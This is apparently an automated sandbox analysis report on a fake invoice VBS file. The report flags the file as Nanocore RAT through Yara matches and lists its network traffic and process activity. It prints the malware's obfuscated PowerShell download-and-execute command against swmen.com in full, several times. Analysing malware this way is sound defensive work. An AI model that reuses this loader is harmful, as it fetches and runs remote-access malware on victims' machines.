          Source: powershell.exe, 00000001.00000002.297299078.000001C72F59F000.00000004.00000001.sdmp, powershell.exe, 00000001.00000003.244374446.000001C747B51000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000001.00000003.274584028.000001C730E6A000.00000004.00000001.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: unknownDNS traffic detected: queries for: swmen.com
          Source: global trafficHTTP traffic detected: GET /ben/PS1vedy.txt HTTP/1.1Host: swmen.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /ben/ServerATEVN.txt HTTP/1.1Host: swmen.com

          E-Banking Fraud:

          barindex
          Yara detected Nanocore RATShow sources
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73feccb38.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73feccb38.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73f60e7c8.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.powershell.exe.1c73f60e7c8.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000000.290807365.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.312159076.000001C73FECA000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.291533940.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.292171904.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000000.291180768.0000000000402000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6152, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 4860, type: MEMORYSTR

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 15.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 15.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 15.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 15.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.powershell.exe.1c73feccb38.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 1.2.powershell.exe.1c73feccb38.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 15.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 15.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.powershell.exe.1c73feccb38.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 1.2.powershell.exe.1c73feccb38.2.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 15.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 15.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.powershell.exe.1c73f60e7c8.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 1.2.powershell.exe.1c73f60e7c8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 15.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 15.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 1.2.powershell.exe.1c73f60e7c8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 1.2.powershell.exe.1c73f60e7c8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000F.00000000.290807365.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0000000F.00000000.290807365.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000001.00000002.312159076.000001C73FECA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000001.00000002.312159076.000001C73FECA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000F.00000000.291533940.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0000000F.00000000.291533940.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000F.00000000.292171904.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0000000F.00000000.292171904.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 0000000F.00000000.291180768.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 0000000F.00000000.291180768.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: Process Memory Space: powershell.exe PID: 6152, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: Process Memory Space: powershell.exe PID: 6152, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Source: Process Memory Space: aspnet_compiler.exe PID: 4860, type: MEMORYSTRMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
          Source: Process Memory Space: aspnet_compiler.exe PID: 4860, type: MEMORYSTRMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
          Wscript starts Powershell (via cmd or directly)Show sources
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN
          Source: 15.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 15.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 15.0.aspnet_compiler.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 15.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 15.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 15.0.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 1.2.powershell.exe.1c73feccb38.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 1.2.powershell.exe.1c73feccb38.2.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 1.2.powershell.exe.1c73feccb38.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 15.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 15.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 15.0.aspnet_compiler.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 1.2.powershell.exe.1c73feccb38.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 1.2.powershell.exe.1c73feccb38.2.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 1.2.powershell.exe.1c73feccb38.2.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 15.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 15.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 15.0.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 1.2.powershell.exe.1c73f60e7c8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 1.2.powershell.exe.1c73f60e7c8.1.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 1.2.powershell.exe.1c73f60e7c8.1.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 15.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 15.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 15.0.aspnet_compiler.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 1.2.powershell.exe.1c73f60e7c8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 1.2.powershell.exe.1c73f60e7c8.1.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
          Source: 1.2.powershell.exe.1c73f60e7c8.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0000000F.00000000.290807365.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0000000F.00000000.290807365.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000001.00000002.312159076.000001C73FECA000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000001.00000002.312159076.000001C73FECA000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0000000F.00000000.291533940.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0000000F.00000000.291533940.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0000000F.00000000.292171904.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0000000F.00000000.292171904.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 0000000F.00000000.291180768.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 0000000F.00000000.291180768.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: 00000001.00000002.303994520.000001C73F3F3000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: Process Memory Space: powershell.exe PID: 6152, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: Process Memory Space: powershell.exe PID: 6152, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: Process Memory Space: aspnet_compiler.exe PID: 4860, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
          Source: Process Memory Space: aspnet_compiler.exe PID: 4860, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFA1D5B1D70
          Source: G2M18C6INV0ICERECEIPT.vbsInitial sample: Strings found which are bigger than 50
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\G2M18C6INV0ICERECEIPT.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Hx = 'HttP://swmen.com/ben/PS1vedy.txt';$HB=('{2}{0}{1}' -f'---------l---------o---------a---------d---------'.RePlace('---------',''),'**********s**********t**********r**********i**********n**********g**********'.RePlace('**********',''),'sss+Dsss+osss+wsss+nsss+'.RePlace('sss+',''));$HBB=('{2}{0}{1}' -f'---------e---------B---------c---------l---------'.RePlace('---------',''),'---------i---------e---------n---------t---------'.RePlace('---------',''),'---------Ne---------t---------.W---------'.RePlace('---------',''));$HBBB=('{2}{0}{1}' -f'------w-o------B------j------e------c------t $------H------'.RePlace('------',''),'------BB------).$H------B(------$H------x)------'.RePlace('------',''),'------I------`e------`X(------Ne------'.RePlace('------',''));$HBBBBB = ($HBBB -Join '')|InVoke-exPressioN
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\20220114Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jvx5tmpj.e0j.ps1Jump to behavior
          Source: classification engineClassification label: mal100.phis.troj.evad.winVBS@8/10@34/3
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: 15.0.aspnet_compiler.exe.400000.4.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csSecurity API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
